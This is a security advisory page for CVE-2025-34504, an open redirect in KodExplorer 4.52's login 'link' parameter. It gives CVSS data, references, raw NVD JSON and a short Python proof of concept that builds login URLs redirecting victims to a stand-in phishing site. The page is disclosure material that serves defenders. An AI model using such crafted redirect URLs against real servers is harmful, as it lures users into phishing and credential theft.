CVE-2025-34504

Description

KodExplorer 4.52 contains an open redirect vulnerability in the user login page that allows attackers to manipulate the 'link' parameter. Attackers can craft malicious URLs in the link parameter to redirect users to arbitrary external websites after authentication.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:kodcloud:kodexplorer:4.52:*:*:*:*:*:*:* - VULNERABLE

KodExplorer 4.52

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-34504 KodExplorer Open Redirect PoC
# Affected Version: KodExplorer <= 4.52
# CVSS Score: 6.1 (Medium)

import urllib.parse

def generate_poc(target_url, redirect_url):
    """
    Generate malicious URL for open redirect attack
    
    Args:
        target_url: Base URL of KodExplorer login page
        redirect_url: Malicious URL to redirect victims to
    
    Returns:
        Malicious URL with crafted link parameter
    """
    encoded_redirect = urllib.parse.quote(redirect_url, safe='')
    malicious_url = f"{target_url}?user/login&link={encoded_redirect}"
    return malicious_url

# Example usage
target = "http://vulnerable-server/index.php"
malicious_redirect = "https://attacker-controlled-site.com/phishing"

poc_url = generate_poc(target, malicious_redirect)
print(f"Malicious URL: {poc_url}")
print(f"\nWhen victim logs in, they will be redirected to: {malicious_redirect}")

# Alternative direct URL format
direct_poc = f"{target}?user/login&link=https://attacker-controlled-site.com/phishing"
print(f"\nDirect PoC URL: {direct_poc}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-34504
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-34504
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-34504/
[4] VulDB https://vuldb.com/cve/CVE-2025-34504
[5] https://github.com/kalcaddle/KodExplorer/releases/tag/4.52
[6] https://kodcloud.com/
[7] https://www.exploit-db.com/exploits/52245
[8] https://www.vulncheck.com/advisories/kodexplorer-open-redirect-vulnerability-via-user-login-endpoint

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-34504", "sourceIdentifier": "[email protected]", "published": "2025-12-11T22:15:53.640", "lastModified": "2025-12-15T18:21:05.293", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "KodExplorer 4.52 contains an open redirect vulnerability in the user login page that allows attackers to manipulate the 'link' parameter. Attackers can craft malicious URLs in the link parameter to redirect users to arbitrary external websites after authentication."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kodcloud:kodexplorer:4.52:*:*:*:*:*:*:*", "matchCriteriaId": "C05C6F5E-BCFD-4162-BA43-945A39D33398"}]}]}], "references": [{"url": "https://github.com/kalcaddle/KodExplorer/releases/tag/4.52", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://kodcloud.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/52245", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/kodexplorer-open-redirect-vulnerability-via-user-login-endpoint", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}